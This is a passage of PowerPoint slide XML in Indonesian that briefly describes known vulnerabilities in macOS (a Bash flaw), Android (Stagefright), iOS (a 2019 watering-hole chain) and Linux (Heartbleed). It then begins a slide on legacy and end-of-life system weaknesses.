              <a:t> macOS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cacat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada shell Bash. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Unix, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di macOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitekturnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Unix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Stagefright</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonjol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MMS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Stagefright</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>iOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2019, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Project Zero Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di iOS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disalahgunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lubang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengunjungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - Bug Heartbleed pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OpenSSL di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Linux. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OpenSSL yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</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174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391593403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Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Warisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akhir Masa Pakai (EOL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>habis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pakainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
